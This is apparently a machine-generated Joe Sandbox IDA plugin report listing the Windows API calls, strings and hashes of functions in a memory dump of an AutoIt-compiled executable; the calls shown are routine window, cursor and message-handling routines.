                    • Opcode ID: b656461d0287370e5118ae47410c3d5185abf705e3770ad2e9d896cdda722fe5
                    • Instruction ID: 4c47bf90add6f18dcf083e1c7802d5569089c2c223181217a4e34cd9a70b134b
                    • Opcode Fuzzy Hash: b656461d0287370e5118ae47410c3d5185abf705e3770ad2e9d896cdda722fe5
                    • Instruction Fuzzy Hash: 556122B1900218EFDF119FA4DC48FBEBB79EF08320F148125FA15AB2A1D6759A41DB91
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CF8D34
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CF8D45
                    • CharNextW.USER32(0000014E), ref: 00CF8D74
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CF8DB5
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CF8DCB
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CF8DDC
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00CF8DF9
                    • SetWindowTextW.USER32(?,0000014E), ref: 00CF8E45
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00CF8E5B
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CF8E8C
                    • _memset.LIBCMT ref: 00CF8EB1
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00CF8EFA
                    • _memset.LIBCMT ref: 00CF8F59
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00CF8F83
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CF8FDB
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00CF9088
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00CF90AA
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CF90F4
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CF9121
                    • DrawMenuBar.USER32(?), ref: 00CF9130
                    • SetWindowTextW.USER32(?,0000014E), ref: 00CF9158
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: 3fb7ba955cfd39c98f0005c121d5dbfb473e1055852a9d70f68281eb8a44d467
                    • Instruction ID: da200f58e7c938148552cf4796602c32d469719271a7f6784004e86afa7ebc47
                    • Opcode Fuzzy Hash: 3fb7ba955cfd39c98f0005c121d5dbfb473e1055852a9d70f68281eb8a44d467
                    • Instruction Fuzzy Hash: 0CE1607490021DABDF609F55CC88FFE7BB9EF05710F108159FA25AA290DB708A85DF62
                    APIs
                    • GetCursorPos.USER32(?), ref: 00CF4C51
                    • GetDesktopWindow.USER32 ref: 00CF4C66
                    • GetWindowRect.USER32(00000000), ref: 00CF4C6D
                    • GetWindowLongW.USER32(?,000000F0), ref: 00CF4CCF
                    • DestroyWindow.USER32(?), ref: 00CF4CFB
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CF4D24
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CF4D42
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CF4D68
                    • SendMessageW.USER32(?,00000421,?,?), ref: 00CF4D7D
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CF4D90
                    • IsWindowVisible.USER32(?), ref: 00CF4DB0
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CF4DCB
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CF4DDF
                    • GetWindowRect.USER32(?,?), ref: 00CF4DF7
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00CF4E1D
                    • GetMonitorInfoW.USER32(00000000,?), ref: 00CF4E37
                    • CopyRect.USER32(?,?), ref: 00CF4E4E
                    • SendMessageW.USER32(?,00000412,00000000), ref: 00CF4EB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: 5a4d0c74c2ebc95361a2b3c4ac115d923d4d4171e07989c10cfcef6004ba46f8
                    • Instruction ID: 1cf2718978a0e286698aee2a1a4b7bf14d7bf2f60066530222b6ea148630f020
                    • Opcode Fuzzy Hash: 5a4d0c74c2ebc95361a2b3c4ac115d923d4d4171e07989c10cfcef6004ba46f8
                    • Instruction Fuzzy Hash: 69B14771604341AFDB48DF65C844B6BBBE4FF88710F00891DF6999B2A1DB71E905CB92
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C728BC
                    • GetSystemMetrics.USER32(00000007), ref: 00C728C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C728EF
                    • GetSystemMetrics.USER32(00000008), ref: 00C728F7
                    • GetSystemMetrics.USER32(00000004), ref: 00C7291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C72939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C72949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C7297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C72990
                    • GetClientRect.USER32(00000000,000000FF), ref: 00C729AE
                    • GetStockObject.GDI32(00000011), ref: 00C729CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C729D5
                      • Part of subcall function 00C72344: GetCursorPos.USER32(?), ref: 00C72357
                      • Part of subcall function 00C72344: ScreenToClient.USER32(00D367B0,?), ref: 00C72374
                      • Part of subcall function 00C72344: GetAsyncKeyState.USER32(00000001), ref: 00C72399
                      • Part of subcall function 00C72344: GetAsyncKeyState.USER32(00000002), ref: 00C723A7
                    • SetTimer.USER32(00000000,00000000,00000028,00C71256), ref: 00C729FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: aea5a71becf0d560db4f2677ecf43f330cf087bd21fbd1e952d58e04928315bf
                    • Instruction ID: 64e9983eee615b7d76416ace53136d7a86ce38dcf8ffa4dc8745f3c8ce7bf3ef
                    • Opcode Fuzzy Hash: aea5a71becf0d560db4f2677ecf43f330cf087bd21fbd1e952d58e04928315bf
                    • Instruction Fuzzy Hash: C4B13D71A0020AAFDB14DFA8DC85BAE7BB4FF08714F108129FA15E62E0DB74D951DB61
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _wcscat$D31560_wcscmp_wcscpy_wcsncpy_wcsstr
                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                    • API String ID: 390803403-1459072770
                    • Opcode ID: 21e2c1580d94c23ebbf358fa0149b5af96913a4ebb4d257b9e7105fed0d34f9d
                    • Instruction ID: 0c5ffc021072e720b854fe24b86a0fe771932cdb55f63eca6a6dcf5ab3cca638
                    • Opcode Fuzzy Hash: 21e2c1580d94c23ebbf358fa0149b5af96913a4ebb4d257b9e7105fed0d34f9d
                    • Instruction Fuzzy Hash: 9B411732500215BBDF14B7649C47EBF77ACDF01750F04016AFA04E6282EB31DA01A6A5
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00CF40F6
                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CF41B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                    • API String ID: 3974292440-719923060
                    • Opcode ID: 207dd0c6a573ce9b03f7ce86a1b8123d6743c15924d8bc8e22ecdec559625606
                    • Instruction ID: d21fd0cc657926c1721aecac9893d2a62403e77944ba585523016d4177e62468
                    • Opcode Fuzzy Hash: 207dd0c6a573ce9b03f7ce86a1b8123d6743c15924d8bc8e22ecdec559625606
                    • Instruction Fuzzy Hash: EEA191302142159FCB58EF14C941A7AB7A5FF84324F10896DF9AA9B3D2DB30ED05DB52
                    APIs
                    • LoadCursorW.USER32(00000000,00007F89), ref: 00CE5309
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00CE5314
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00CE531F
                    • LoadCursorW.USER32(00000000,00007F03), ref: 00CE532A
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00CE5335
                    • LoadCursorW.USER32(00000000,00007F01), ref: 00CE5340
                    • LoadCursorW.USER32(00000000,00007F81), ref: 00CE534B
                    • LoadCursorW.USER32(00000000,00007F88), ref: 00CE5356
                    • LoadCursorW.USER32(00000000,00007F80), ref: 00CE5361
                    • LoadCursorW.USER32(00000000,00007F86), ref: 00CE536C
                    • LoadCursorW.USER32(00000000,00007F83), ref: 00CE5377
                    • LoadCursorW.USER32(00000000,00007F85), ref: 00CE5382
                    • LoadCursorW.USER32(00000000,00007F82), ref: 00CE538D
                    • LoadCursorW.USER32(00000000,00007F84), ref: 00CE5398
                    • LoadCursorW.USER32(00000000,00007F04), ref: 00CE53A3
                    • LoadCursorW.USER32(00000000,00007F02), ref: 00CE53AE
                    • GetCursorInfo.USER32(?), ref: 00CE53BE
                    • GetLastError.KERNEL32(00000001,00000000), ref: 00CE53E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Cursor$Load$ErrorInfoLast
                    • String ID:
                    • API String ID: 3215588206-0
                    • Opcode ID: 8daeb566c974159facee70d471d5fc731b73648b653bf56799c635913eba22c1
                    • Instruction ID: 824791bdf8d02ae7f4340878ba6cb0c39d5c348d24ef9a7de3fe104ac05b0a66
                    • Opcode Fuzzy Hash: 8daeb566c974159facee70d471d5fc731b73648b653bf56799c635913eba22c1
                    • Instruction Fuzzy Hash: B6418270E043196ADB109FBA8C49D6FFFF8EF51B20B10452FE519E7290DAB8A501CE61
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 00CCAAA5
                    • __swprintf.LIBCMT ref: 00CCAB46
                    • _wcscmp.LIBCMT ref: 00CCAB59
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00CCABAE
                    • _wcscmp.LIBCMT ref: 00CCABEA
                    • GetClassNameW.USER32(?,?,00000400), ref: 00CCAC21
                    • GetDlgCtrlID.USER32(?), ref: 00CCAC73
                    • GetWindowRect.USER32(?,?), ref: 00CCACA9
                    • GetParent.USER32(?), ref: 00CCACC7
                    • ScreenToClient.USER32(00000000), ref: 00CCACCE
                    • GetClassNameW.USER32(?,?,00000100), ref: 00CCAD48
                    • _wcscmp.LIBCMT ref: 00CCAD5C
                    • GetWindowTextW.USER32(?,?,00000400), ref: 00CCAD82
                    • _wcscmp.LIBCMT ref: 00CCAD96
                      • Part of subcall function 00C9386C: _iswctype.LIBCMT ref: 00C93874
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: 5ed90d174453104664afabe634d184c55e26f9e2b779ad73cbe94ace321fead3
                    • Instruction ID: e208c83ca11efb93b63230937fe579c465cc1c0fdc4dd3af47506cf6c254dd72
                    • Opcode Fuzzy Hash: 5ed90d174453104664afabe634d184c55e26f9e2b779ad73cbe94ace321fead3
                    • Instruction Fuzzy Hash: B4A1A27160460AAFD714DF64C888FAAF7E8FF04319F10452DF9AAD2190DB30EA55DB92
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00CCB3DB
                    • _wcscmp.LIBCMT ref: 00CCB3EC
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00CCB414
                    • CharUpperBuffW.USER32(?,00000000), ref: 00CCB431
                    • _wcscmp.LIBCMT ref: 00CCB44F
                    • _wcsstr.LIBCMT ref: 00CCB460
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00CCB498
                    • _wcscmp.LIBCMT ref: 00CCB4A8
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00CCB4CF
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00CCB518
                    • _wcscmp.LIBCMT ref: 00CCB528
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00CCB550
                    • GetWindowRect.USER32(00000004,?), ref: 00CCB5B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: fba7f61c6fba2c0dbee50113bafe579f3d8f95dafc333225c3b8797fb9c634a9
                    • Instruction ID: ed7c85340387a44fbc458fdddd47197ecc8a5e7f3716a4ac5bf6cf2258f185e3
                    • Opcode Fuzzy Hash: fba7f61c6fba2c0dbee50113bafe579f3d8f95dafc333225c3b8797fb9c634a9
                    • Instruction Fuzzy Hash: 5C8192710083459FDB04DF90C986FAABBE8EF44314F04856EFD999A0A2DB34DE46CB61
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: fb9169c40831e21ea5e13fcf715554ec5111da4c1ecbe73bfb4432f0d94ec930
                    • Instruction ID: f7cef9ffcdb787a0b68d702108a724ab0fe4095f402d7d0b164919bd5592ec4b
                    • Opcode Fuzzy Hash: fb9169c40831e21ea5e13fcf715554ec5111da4c1ecbe73bfb4432f0d94ec930
                    • Instruction Fuzzy Hash: E0314530A44319AACF14FAA0DD53FEEB7A8AF30710F604128F415720E2EF616F08E561
                    APIs
                    • LoadIconW.USER32(00000063), ref: 00CCC4D4
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CCC4E6
                    • SetWindowTextW.USER32(?,?), ref: 00CCC4FD
                    • GetDlgItem.USER32(?,000003EA), ref: 00CCC512
                    • SetWindowTextW.USER32(00000000,?), ref: 00CCC518
                    • GetDlgItem.USER32(?,000003E9), ref: 00CCC528
                    • SetWindowTextW.USER32(00000000,?), ref: 00CCC52E
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00CCC54F
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00CCC569
                    • GetWindowRect.USER32(?,?), ref: 00CCC572
                    • SetWindowTextW.USER32(?,?), ref: 00CCC5DD
                    • GetDesktopWindow.USER32 ref: 00CCC5E3
                    • GetWindowRect.USER32(00000000), ref: 00CCC5EA
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00CCC636
                    • GetClientRect.USER32(?,?), ref: 00CCC643
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00CCC668
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00CCC693
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    • Opcode ID: 28fba10f24750c4db37e02c8d1d224200ca996a56f179145347dd47812a6e6fe
                    • Instruction ID: 9e296bb8fc52cd05ff720eff488d60095eaa523cbfa9126373b3c2ba2b7534bf
                    • Opcode Fuzzy Hash: 28fba10f24750c4db37e02c8d1d224200ca996a56f179145347dd47812a6e6fe
                    • Instruction Fuzzy Hash: 99515B71900709AFDB20DFA8DE89F6EBBB5FF04705F00492CF696A25A0CB74A945DB50
                    APIs
                    • _memset.LIBCMT ref: 00CFA4C8
                    • DestroyWindow.USER32(?,?), ref: 00CFA542
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CFA5BC
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CFA5DE
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CFA5F1
                    • DestroyWindow.USER32(00000000), ref: 00CFA613
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C70000,00000000), ref: 00CFA64A
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CFA663
                    • GetDesktopWindow.USER32 ref: 00CFA67C
                    • GetWindowRect.USER32(00000000), ref: 00CFA683
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CFA69B
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CFA6B3
                      • Part of subcall function 00C725DB: GetWindowLongW.USER32(?,000000EB), ref: 00C725EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: e995de73bc8aebab871a8bba29f2fa5df080f55d9e1be278e4a62d38a8ba6540
                    • Instruction ID: b264e8b67d01368a52ee32e08de81026a3ee3ef6dadd877763da163dbe238b9d
                    • Opcode Fuzzy Hash: e995de73bc8aebab871a8bba29f2fa5df080f55d9e1be278e4a62d38a8ba6540
                    • Instruction Fuzzy Hash: 6D717EB1140209AFD720CF28CC45F7AB7E5EB88344F08452DFA99C72A0D770E906DB26
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00CF46AB
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CF46F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: 5eb3de788cdd45b161c654d2a3931a01d928e880945a66109200289f4e5a2bc2
                    • Instruction ID: 4fcbdaa8bb117ae5460bb68be4ca264c787b1425f8a7a442441a88495e742086
                    • Opcode Fuzzy Hash: 5eb3de788cdd45b161c654d2a3931a01d928e880945a66109200289f4e5a2bc2
                    • Instruction Fuzzy Hash: B891A2342043059FCB18EF14C451A7EB7A1EF94324F14846DF99A5B3A2DB70EE46EB42
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CFBB6E
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00CF9431), ref: 00CFBBCA
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFBC03
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CFBC46
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFBC7D
                    • FreeLibrary.KERNEL32(?), ref: 00CFBC89
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CFBC99
                    • DestroyCursor.USER32(?), ref: 00CFBCA8
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CFBCC5
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CFBCD1
